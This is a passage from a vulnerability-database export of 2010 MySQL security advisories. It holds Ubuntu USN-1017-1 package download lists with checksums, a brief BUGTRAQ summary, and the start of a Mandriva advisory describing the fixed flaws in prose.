0363a16f629a35474853c04883bd5ab3\r\n\r\n armel architecture &#40;ARM Architecture&#41;:\r\n\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/libmysqlclient-dev_5.1.37-1ubuntu5.5_armel.deb\r\n Size/MD5: 2288474 20b98307f3d8eae926e9a267c83cc675\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/libmysqlclient16_5.1.37-1ubuntu5.5_armel.deb\r\n Size/MD5: 1792580 8416658c287fc47df4a88cfd975bc861\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/libmysqld-dev_5.1.37-1ubuntu5.5_armel.deb\r\n Size/MD5: 5287846 f7fb108f9c0040a6313ce7c1d71a037f\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/libmysqld-pic_5.1.37-1ubuntu5.5_armel.deb\r\n Size/MD5: 4311738 a8ac7c897f8d958f1945c29bc0e1cba6\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/mysql-client-5.1_5.1.37-1ubuntu5.5_armel.deb\r\n Size/MD5: 7415966 f4dff3cd298ca1cc1343443625df59c9\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/mysql-server-5.1_5.1.37-1ubuntu5.5_armel.deb\r\n Size/MD5: 6765750 0295731bc47b322cca7974b92b934f0d\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/mysql-server-core-5.1_5.1.37-1ubuntu5.5_armel.deb\r\n Size/MD5: 3464918 80261238e82a60574de5ad7ec947c006\r\n\r\n lpia architecture &#40;Low Power Intel Architecture&#41;:\r\n\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/libmysqlclient-dev_5.1.37-1ubuntu5.5_lpia.deb\r\n Size/MD5: 2322318 62a59caee4959c63fbbbb682052d8e20\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/libmysqlclient16_5.1.37-1ubuntu5.5_lpia.deb\r\n Size/MD5: 1905624 4d96043bd14b49f1860f1917e489c06b\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/libmysqld-dev_5.1.37-1ubuntu5.5_lpia.deb\r\n Size/MD5: 5398390 74731410a65f8452a6ae2bdc990d2418\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/libmysqld-pic_5.1.37-1ubuntu5.5_lpia.deb\r\n Size/MD5: 4182098 d9e13eb60231b2f5038938b5ef03ea86\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/mysql-client-5.1_5.1.37-1ubuntu5.5_lpia.deb\r\n Size/MD5: 8190806 9d16d8907b9d4da4b7bcf9b38a239453\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/mysql-server-5.1_5.1.37-1ubuntu5.5_lpia.deb\r\n Size/MD5: 7197878 8251d96c880ae454f2b399a0101dfb59\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/mysql-server-core-5.1_5.1.37-1ubuntu5.5_lpia.deb\r\n Size/MD5: 3828970 0097560c7892383fbf56080ab6d9c795\r\n\r\n powerpc architecture &#40;Apple Macintosh G3/G4/G5&#41;:\r\n\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/libmysqlclient-dev_5.1.37-1ubuntu5.5_powerpc.deb\r\n Size/MD5: 2419218 a0ced7255dd4a7d6f5221cfd4ec12c38\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/libmysqlclient16_5.1.37-1ubuntu5.5_powerpc.deb\r\n Size/MD5: 1935528 bb45cb56160edf9fb1eadbd5b3690a1b\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/libmysqld-dev_5.1.37-1ubuntu5.5_powerpc.deb\r\n Size/MD5: 5630372 611b47bbcad0e669bb662ce9a4a6665d\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/libmysqld-pic_5.1.37-1ubuntu5.5_powerpc.deb\r\n Size/MD5: 4363226 5c2610076f8df7d86e92aae18f238635\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/mysql-client-5.1_5.1.37-1ubuntu5.5_powerpc.deb\r\n Size/MD5: 8691618 fefe972a0a189ded67bf7aa16a1185b8\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/mysql-server-5.1_5.1.37-1ubuntu5.5_powerpc.deb\r\n Size/MD5: 7207692 585ce3dddb191f416e12c9f2b51a2004\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/mysql-server-core-5.1_5.1.37-1ubuntu5.5_powerpc.deb\r\n Size/MD5: 4063606 72da7ea5182956ba32f66d2ee23a3fdd\r\n\r\n sparc architecture &#40;Sun SPARC/UltraSPARC&#41;:\r\n\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/libmysqlclient-dev_5.1.37-1ubuntu5.5_sparc.deb\r\n Size/MD5: 2319342 70d608594f5cf135c1146abd43a8e445\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/libmysqlclient16_5.1.37-1ubuntu5.5_sparc.deb\r\n Size/MD5: 1926218 559f770cdb9cdec49bd724ca780b51af\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/libmysqld-dev_5.1.37-1ubuntu5.5_sparc.deb\r\n Size/MD5: 5293588 00a18546295d7765191d347a3414459a\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/libmysqld-pic_5.1.37-1ubuntu5.5_sparc.deb\r\n Size/MD5: 4080864 ecd088d30b64600dd893dd85c78ff05d\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/mysql-client-5.1_5.1.37-1ubuntu5.5_sparc.deb\r\n Size/MD5: 8335248 de8c6e0b6439708c6b0df095db0764bd\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/mysql-server-5.1_5.1.37-1ubuntu5.5_sparc.deb\r\n Size/MD5: 7299784 64bfe588882ef1c1ea7bab9d538d9385\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/mysql-server-core-5.1_5.1.37-1ubuntu5.5_sparc.deb\r\n Size/MD5: 3879404 a4da166556e276d7fbfb3afa10555b19\r\n\r\nUpdated packages for Ubuntu 10.04 LTS:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/mysql-dfsg-5.1_5.1.41-3ubuntu12.7.diff.gz\r\n Size/MD5: 341522 2dedee77a23f60a8923ef633c626bcab\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/mysql-dfsg-5.1_5.1.41-3ubuntu12.7.dsc\r\n Size/MD5: 2577 916ca7a18d8315fc01878d987b8fb2e9\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/mysql-dfsg-5.1_5.1.41.orig.tar.gz\r\n Size/MD5: 19970033 7652277028a7dedc6e1b5a9d87f6bfe6\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/libmysqlclient16-dev_5.1.41-3ubuntu12.7_all.deb\r\n Size/MD5: 94418 98013f0aa27b5cd56d6b0959755acb63\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/mysql-client_5.1.41-3ubuntu12.7_all.deb\r\n Size/MD5: 94476 90c21f8021ff74ef8f0b51c3361a67fc\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/mysql-common_5.1.41-3ubuntu12.7_all.deb\r\n Size/MD5: 98636 6a2cb0dca9993c5bd760e653af26bfba\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/mysql-server_5.1.41-3ubuntu12.7_all.deb\r\n Size/MD5: 94604 7ce993505db3145e27cbaa9561d9757f\r\n\r\n amd64 architecture &#40;Athlon64, Opteron, EM64T Xeon&#41;:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/libmysqlclient-dev_5.1.41-3ubuntu12.7_amd64.deb\r\n Size/MD5: 3223076 dd7a36078d8ffc4156002fa45fbd3496\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/libmysqlclient16_5.1.41-3ubuntu12.7_amd64.deb\r\n Size/MD5: 1986496 372d1279a872224bd9a23735719ccc3c\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/libmysqld-dev_5.1.41-3ubuntu12.7_amd64.deb\r\n Size/MD5: 5723882 bf86e090998e98ba3e3524674ce38399\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/libmysqld-pic_5.1.41-3ubuntu12.7_amd64.deb\r\n Size/MD5: 4471388 c02e1a665b1ff9f01e0d015b8723f84d\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/mysql-client-5.1_5.1.41-3ubuntu12.7_amd64.deb\r\n Size/MD5: 8748306 b97c6d4ce926a72389f8fc4bde987108\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/mysql-client-core-5.1_5.1.41-3ubuntu12.7_amd64.deb\r\n Size/MD5: 187866 eaeab5c4a74dbdbf7dc3491337b5816a\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/mysql-server-5.1_5.1.41-3ubuntu12.7_amd64.deb\r\n Size/MD5: 7104886 40289c8486583236f01f7b92d2ae850f\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/mysql-server-core-5.1_5.1.41-3ubuntu12.7_amd64.deb\r\n Size/MD5: 5002110 a042514c9d112495527838f9cc90b216\r\n http://security.ubuntu.com/ubuntu/pool/universe/m/mysql-dfsg-5.1/mysql-testsuite_5.1.41-3ubuntu12.7_amd64.deb\r\n Size/MD5: 5854888 889d471d902c1cc6e551bafa937ddba5\r\n\r\n i386 architecture &#40;x86 compatible Intel/AMD&#41;:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/libmysqlclient-dev_5.1.41-3ubuntu12.7_i386.deb\r\n Size/MD5: 3120982 98846212f393e41fe3fdf1deeaf67164\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/libmysqlclient16_5.1.41-3ubuntu12.7_i386.deb\r\n Size/MD5: 1932800 1745df40283bd84666f2d2baf0e7b825\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/libmysqld-dev_5.1.41-3ubuntu12.7_i386.deb\r\n Size/MD5: 5483392 2dd6de38f8445b0a881465b866f22ed1\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/libmysqld-pic_5.1.41-3ubuntu12.7_i386.deb\r\n Size/MD5: 4252774 cc3f3566c0ffc1ad56256c72df0bba66\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/mysql-client-5.1_5.1.41-3ubuntu12.7_i386.deb\r\n Size/MD5: 8140854 b6c531dc0a508028fb6750a8a97cffed\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/mysql-client-core-5.1_5.1.41-3ubuntu12.7_i386.deb\r\n Size/MD5: 178016 4152e6d2a6f2e0691747dc720884bd1a\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/mysql-server-5.1_5.1.41-3ubuntu12.7_i386.deb\r\n Size/MD5: 7008926 651a698609fd23d35042d1cc2944a3b8\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/mysql-server-core-5.1_5.1.41-3ubuntu12.7_i386.deb\r\n Size/MD5: 4713646 8deca71ef1e6e4d069fe83f0e0e753a0\r\n http://security.ubuntu.com/ubuntu/pool/universe/m/mysql-dfsg-5.1/mysql-testsuite_5.1.41-3ubuntu12.7_i386.deb\r\n Size/MD5: 5854620 306063c37c634c072478bbc955ea2100\r\n\r\n armel architecture &#40;ARM Architecture&#41;:\r\n\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/libmysqlclient-dev_5.1.41-3ubuntu12.7_armel.deb\r\n Size/MD5: 3013290 827ad26ea7fa08bd1e2e3973cdcb75fe\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/libmysqlclient16_5.1.41-3ubuntu12.7_armel.deb\r\n Size/MD5: 1815220 9afb671ee13d6ec83393dbc22cfe4157\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/libmysqld-dev_5.1.41-3ubuntu12.7_armel.deb\r\n Size/MD5: 5349762 d9cf3ccfaa7c4ca03207df8685ad9208\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/libmysqld-pic_5.1.41-3ubuntu12.7_armel.deb\r\n Size/MD5: 4167498 5712428d809e5692ea97ddc22f072144\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/mysql-client-5.1_5.1.41-3ubuntu12.7_armel.deb\r\n Size/MD5: 7839032 9d3fb4fa4abd37cab1492d64f9ff73fa\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/mysql-client-core-5.1_5.1.41-3ubuntu12.7_armel.deb\r\n Size/MD5: 176658 31e661ab1a3cc8a7cf6e4aeb3c7d0dcb\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/mysql-server-5.1_5.1.41-3ubuntu12.7_armel.deb\r\n Size/MD5: 6649318 7c9cb70f88945f1315c02c54582d0e38\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/mysql-server-core-5.1_5.1.41-3ubuntu12.7_armel.deb\r\n Size/MD5: 4527384 ef5b51c9cbe92a4cc044d13bd9de8fc2\r\n http://ports.ubuntu.com/pool/universe/m/mysql-dfsg-5.1/mysql-testsuite_5.1.41-3ubuntu12.7_armel.deb\r\n Size/MD5: 6123626 e2a83e6c0139446b80c086243dda73e4\r\n\r\n powerpc architecture &#40;Apple Macintosh G3/G4/G5&#41;:\r\n\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/libmysqlclient-dev_5.1.41-3ubuntu12.7_powerpc.deb\r\n Size/MD5: 3222050 67e6f36948e272fad3fd2d984bd8de80\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/libmysqlclient16_5.1.41-3ubuntu12.7_powerpc.deb\r\n Size/MD5: 1962756 89727e949e4abc8ee7a4e2ae3546d0e8\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/libmysqld-dev_5.1.41-3ubuntu12.7_powerpc.deb\r\n Size/MD5: 5679618 7a0a4f87f4c6db95bc4635d68540b3a4\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/libmysqld-pic_5.1.41-3ubuntu12.7_powerpc.deb\r\n Size/MD5: 4399862 ce16555ac32b7437de2d4253cf69707b\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/mysql-client-5.1_5.1.41-3ubuntu12.7_powerpc.deb\r\n Size/MD5: 8611942 24293d5d3cf3d07d4dd7465207c5b37d\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/mysql-client-core-5.1_5.1.41-3ubuntu12.7_powerpc.deb\r\n Size/MD5: 184446 0ecb05e0b85af24205b1fb6dd8cda569\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/mysql-server-5.1_5.1.41-3ubuntu12.7_powerpc.deb\r\n Size/MD5: 7078860 9244d73aacc4dcc086405badab3f4dc9\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/mysql-server-core-5.1_5.1.41-3ubuntu12.7_powerpc.deb\r\n Size/MD5: 4925814 36478289c2db2b8719ac6dcdd576cc5c\r\n http://ports.ubuntu.com/pool/universe/m/mysql-dfsg-5.1/mysql-testsuite_5.1.41-3ubuntu12.7_powerpc.deb\r\n Size/MD5: 5855794 c3a975ca6f89b5993caac46c2145abc9\r\n\r\nUpdated packages for Ubuntu 10.10:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-5.1/mysql-5.1_5.1.49-1ubuntu8.1.diff.gz\r\n Size/MD5: 305493 bf1401a668e17d2fe8968b3eb5e972cd\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-5.1/mysql-5.1_5.1.49-1ubuntu8.1.dsc\r\n Size/MD5: 2515 8ab9c7f2d21ffb997084059c810c5fdf\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-5.1/mysql-5.1_5.1.49.orig.tar.gz\r\n Size/MD5: 23687599 a90d87a71fa3c23dff6d78afc8e3184c\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-5.1/libmysqlclient16-dev_5.1.49-1ubuntu8.1_all.deb\r\n Size/MD5: 60646 5c4d4c5704b346d44d5c7c8067186ebd\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-5.1/mysql-client_5.1.49-1ubuntu8.1_all.deb\r\n Size/MD5: 60704 95d45d5a1a5752b684daf8baf10d7e13\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-5.1/mysql-common_5.1.49-1ubuntu8.1_all.deb\r\n Size/MD5: 64190 600cb8fd550ce078dc43e857fa8c44b5\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-5.1/mysql-server_5.1.49-1ubuntu8.1_all.deb\r\n Size/MD5: 60828 ee67984f242c5dd457bd9922b84584f5\r\n\r\n amd64 architecture &#40;Athlon64, Opteron, EM64T Xeon&#41;:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-5.1/libmysqlclient-dev_5.1.49-1ubuntu8.1_amd64.deb\r\n Size/MD5: 3220050 dcd190be3d830c7467df1e7691be244d\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-5.1/libmysqlclient16_5.1.49-1ubuntu8.1_amd64.deb\r\n Size/MD5: 1935174 b484f56c341c2dfe333251310eca9d05\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-5.1/libmysqld-dev_5.1.49-1ubuntu8.1_amd64.deb\r\n Size/MD5: 5719086 a3485ac465903beb15c2637be8600dd2\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-5.1/libmysqld-pic_5.1.49-1ubuntu8.1_amd64.deb\r\n Size/MD5: 4471496 1a5764de1b2fee475fcd25ff60ae9f2e\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-5.1/mysql-client-5.1_5.1.49-1ubuntu8.1_amd64.deb\r\n Size/MD5: 8671758 da2ab2925e42cd21375afb783af04ad1\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-5.1/mysql-client-core-5.1_5.1.49-1ubuntu8.1_amd64.deb\r\n Size/MD5: 153814 d1e5075ed246e2dcd1c098464ee5a08f\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-5.1/mysql-server-5.1_5.1.49-1ubuntu8.1_amd64.deb\r\n Size/MD5: 7080970 1dd0ef80777971812572d116b18d35c0\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-5.1/mysql-server-core-5.1_5.1.49-1ubuntu8.1_amd64.deb\r\n Size/MD5: 4957194 cb8fd00319578705a7070f53771a8320\r\n http://security.ubuntu.com/ubuntu/pool/universe/m/mysql-5.1/mysql-testsuite_5.1.49-1ubuntu8.1_amd64.deb\r\n Size/MD5: 7368730 cc7c4a05da37f2bf1472ae15ca2f714f\r\n\r\n i386 architecture &#40;x86 compatible Intel/AMD&#41;:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-5.1/libmysqlclient-dev_5.1.49-1ubuntu8.1_i386.deb\r\n Size/MD5: 3105726 3004afe76e052d4d5f01516a11f0495b\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-5.1/libmysqlclient16_5.1.49-1ubuntu8.1_i386.deb\r\n Size/MD5: 1881264 5de57206e1461e9aa67390233b8b2d82\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-5.1/libmysqld-dev_5.1.49-1ubuntu8.1_i386.deb\r\n Size/MD5: 5470154 48cc3113379fec6769668dd9ebcfa50c\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-5.1/libmysqld-pic_5.1.49-1ubuntu8.1_i386.deb\r\n Size/MD5: 4241500 a60587a1d9f508946ed32860fa530daa\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-5.1/mysql-client-5.1_5.1.49-1ubuntu8.1_i386.deb\r\n Size/MD5: 8025360 9a9904a2acd2ac6011ebf6292b20c720\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-5.1/mysql-client-core-5.1_5.1.49-1ubuntu8.1_i386.deb\r\n Size/MD5: 143678 12c55b61ff1a84aacb25ad2c8b66ba10\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-5.1/mysql-server-5.1_5.1.49-1ubuntu8.1_i386.deb\r\n Size/MD5: 6968662 14a3a361658f3d01fae0e382b3f5a2d3\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-5.1/mysql-server-core-5.1_5.1.49-1ubuntu8.1_i386.deb\r\n Size/MD5: 4643116 99ca4a15e99da47659b9092a920f99f0\r\n http://security.ubuntu.com/ubuntu/pool/universe/m/mysql-5.1/mysql-testsuite_5.1.49-1ubuntu8.1_i386.deb\r\n Size/MD5: 6985638 39ba73f90d9599bc1ae94e8d49f43a62\r\n\r\n armel architecture &#40;ARM Architecture&#41;:\r\n\r\n http://ports.ubuntu.com/pool/main/m/mysql-5.1/libmysqlclient-dev_5.1.49-1ubuntu8.1_armel.deb\r\n Size/MD5: 3218612 f222c6d8d91ba8e92134fc78da7ac628\r\n http://ports.ubuntu.com/pool/main/m/mysql-5.1/libmysqlclient16_5.1.49-1ubuntu8.1_armel.deb\r\n Size/MD5: 1892262 360b5e68119affa2b521a14f49f0177f\r\n http://ports.ubuntu.com/pool/main/m/mysql-5.1/libmysqld-dev_5.1.49-1ubuntu8.1_armel.deb\r\n Size/MD5: 5763584 8433af4cdcbd670215ded8c1919b681e\r\n http://ports.ubuntu.com/pool/main/m/mysql-5.1/libmysqld-pic_5.1.49-1ubuntu8.1_armel.deb\r\n Size/MD5: 4481508 e9d1759385ccee7ac591f27bb98a2d50\r\n http://ports.ubuntu.com/pool/main/m/mysql-5.1/mysql-client-5.1_5.1.49-1ubuntu8.1_armel.deb\r\n Size/MD5: 8415362 7076122233d2c649598ec4c1a113af1e\r\n http://ports.ubuntu.com/pool/main/m/mysql-5.1/mysql-client-core-5.1_5.1.49-1ubuntu8.1_armel.deb\r\n Size/MD5: 147198 e7a41ec8850b5bcfd21826ba30805546\r\n http://ports.ubuntu.com/pool/main/m/mysql-5.1/mysql-server-5.1_5.1.49-1ubuntu8.1_armel.deb\r\n Size/MD5: 6991658 5673eb309fa0751d71093e4dad432393\r\n http://ports.ubuntu.com/pool/main/m/mysql-5.1/mysql-server-core-5.1_5.1.49-1ubuntu8.1_armel.deb\r\n Size/MD5: 4829048 6484be204ab8f596969cf62a4fa6f7ec\r\n http://ports.ubuntu.com/pool/universe/m/mysql-5.1/mysql-testsuite_5.1.49-1ubuntu8.1_armel.deb\r\n Size/MD5: 7380590 e96ddf4dd5a7a5569c6814b6dfaea26f\r\n\r\n powerpc architecture &#40;Apple Macintosh G3/G4/G5&#41;:\r\n\r\n http://ports.ubuntu.com/pool/main/m/mysql-5.1/libmysqlclient-dev_5.1.49-1ubuntu8.1_powerpc.deb\r\n Size/MD5: 3206172 8a345dc27b2f504ec0ece62bf21a2ff9\r\n http://ports.ubuntu.com/pool/main/m/mysql-5.1/libmysqlclient16_5.1.49-1ubuntu8.1_powerpc.deb\r\n Size/MD5: 1911892 785ae6e822dc75fafb1bff4b53625692\r\n http://ports.ubuntu.com/pool/main/m/mysql-5.1/libmysqld-dev_5.1.49-1ubuntu8.1_powerpc.deb\r\n Size/MD5: 5672730 74464f121fa7f900912ad87d434fe286\r\n http://ports.ubuntu.com/pool/main/m/mysql-5.1/libmysqld-pic_5.1.49-1ubuntu8.1_powerpc.deb\r\n Size/MD5: 4395190 6607c4966d73f6868cc0af0b466133d9\r\n http://ports.ubuntu.com/pool/main/m/mysql-5.1/mysql-client-5.1_5.1.49-1ubuntu8.1_powerpc.deb\r\n Size/MD5: 8521778 b95cf62dea1e5047ee633336caf1b9a3\r\n http://ports.ubuntu.com/pool/main/m/mysql-5.1/mysql-client-core-5.1_5.1.49-1ubuntu8.1_powerpc.deb\r\n Size/MD5: 150358 f9b51c4963a90a4955e3daa49a0638ad\r\n http://ports.ubuntu.com/pool/main/m/mysql-5.1/mysql-server-5.1_5.1.49-1ubuntu8.1_powerpc.deb\r\n Size/MD5: 7036216 bf51324d366812e5e550769e89cd3bbe\r\n http://ports.ubuntu.com/pool/main/m/mysql-5.1/mysql-server-core-5.1_5.1.49-1ubuntu8.1_powerpc.deb\r\n Size/MD5: 4872378 2c557c62dbf828f726dc8ebff63700e8\r\n http://ports.ubuntu.com/pool/universe/m/mysql-5.1/mysql-testsuite_5.1.49-1ubuntu8.1_powerpc.deb\r\n Size/MD5: 6985654 31544cfd6d9944ea6e3c8e9c6d22f84f\r\n\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2010-11-15T00:00:00", "title": "[USN-1017-1] MySQL vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:37", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2010-3837", "CVE-2010-3680", "CVE-2010-3678", "CVE-2010-3839", "CVE-2010-3835", "CVE-2010-3681", "CVE-2010-3833", "CVE-2010-3840", "CVE-2010-3682", "CVE-2010-3679", "CVE-2010-2008", "CVE-2010-3836", "CVE-2010-3683", "CVE-2010-3677", "CVE-2010-3834", "CVE-2010-3838"], "modified": "2010-11-15T00:00:00", "id": "SECURITYVULNS:DOC:25125", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25125", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:39", "references": ["https://vulners.com/securityvulns/securityvulns:doc:25096", "https://vulners.com/securityvulns/securityvulns:doc:25125"], "description": "Unauthrozied ALTER DATABASE / UPGRADE DATA DIRECTORY files access, multiple DoS conditions.", "edition": 1, "reporter": "BUGTRAQ", "published": "2010-11-15T00:00:00", "title": "MySQL multiple security vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:09:39", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "MySQL", "version": "5.1", "operator": "eq"}], "cvelist": ["CVE-2010-3837", "CVE-2010-3680", "CVE-2010-3678", "CVE-2010-3839", "CVE-2010-3835", "CVE-2010-3681", "CVE-2010-3833", "CVE-2010-3840", "CVE-2010-3682", "CVE-2010-3679", "CVE-2010-2008", "CVE-2010-3676", "CVE-2010-3836", "CVE-2010-3683", "CVE-2010-3677", "CVE-2010-3834", "CVE-2010-3838"], "modified": "2010-11-15T00:00:00", "id": "SECURITYVULNS:VULN:11243", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11243", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:37", "references": [], "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2010:155-1\r\n http://www.mandriva.com/security/\r\n _______________________________________________________________________\r\n\r\n Package : mysql\r\n Date : November 8, 2010\r\n Affected: 2009.1\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n Multiple vulnerabilities has been found and corrected in mysql:\r\n \r\n MySQL before 5.1.48 allows remote authenticated users with alter\r\n database privileges to cause a denial of service &#40;server crash\r\n and database loss&#41; via an ALTER DATABASE command with a #mysql50#\r\n string followed by a . &#40;dot&#41;, .. &#40;dot dot&#41;, ../ &#40;dot dot slash&#41; or\r\n similar sequence, and an UPGRADE DATA DIRECTORY NAME command, which\r\n causes MySQL to move certain directories to the server data directory\r\n &#40;CVE-2010-2008&#41;.\r\n \r\n Additionally many security issues noted in the 5.1.49 release notes\r\n has been addressed with this advisory as well, such as:\r\n \r\n * LOAD DATA INFILE did not check for SQL errors and sent an OK packet\r\n even when errors were already reported. Also, an assert related to\r\n client-server protocol checking in debug servers sometimes was raised\r\n when it should not have been. &#40;Bug#52512&#41; &#40;CVE-2010-3683&#41;\r\n \r\n * Using EXPLAIN with queries of the form SELECT ... UNION ... ORDER\r\n BY &#40;SELECT ... WHERE ...&#41; could cause a server crash. &#40;Bug#52711&#41;\r\n &#40;CVE-2010-3682&#41;\r\n \r\n * The server could crash if there were alternate reads from two indexes\r\n on a table using the HANDLER interface. &#40;Bug#54007&#41; &#40;CVE-2010-3681&#41;\r\n \r\n * A malformed argument to the BINLOG statement could result in Valgrind\r\n warnings or a server crash. &#40;Bug#54393&#41; &#40;CVE-2010-3679&#41;\r\n \r\n * Incorrect handling of NULL arguments could lead to a crash for IN&#40;&#41;\r\n or CASE operations when NULL arguments were either passed explicitly\r\n as arguments &#40;for IN&#40;&#41;&#41; or implicitly generated by the WITH ROLLUP\r\n modifier &#40;for IN&#40;&#41; and CASE&#41;. &#40;Bug#54477&#41; &#40;CVE-2010-3678&#41;\r\n \r\n * Joins involving a table with with a unique SET column could cause\r\n a server crash. &#40;Bug#54575&#41; &#40;CVE-2010-3677&#41;\r\n \r\n * Use of TEMPORARY InnoDB tables with nullable 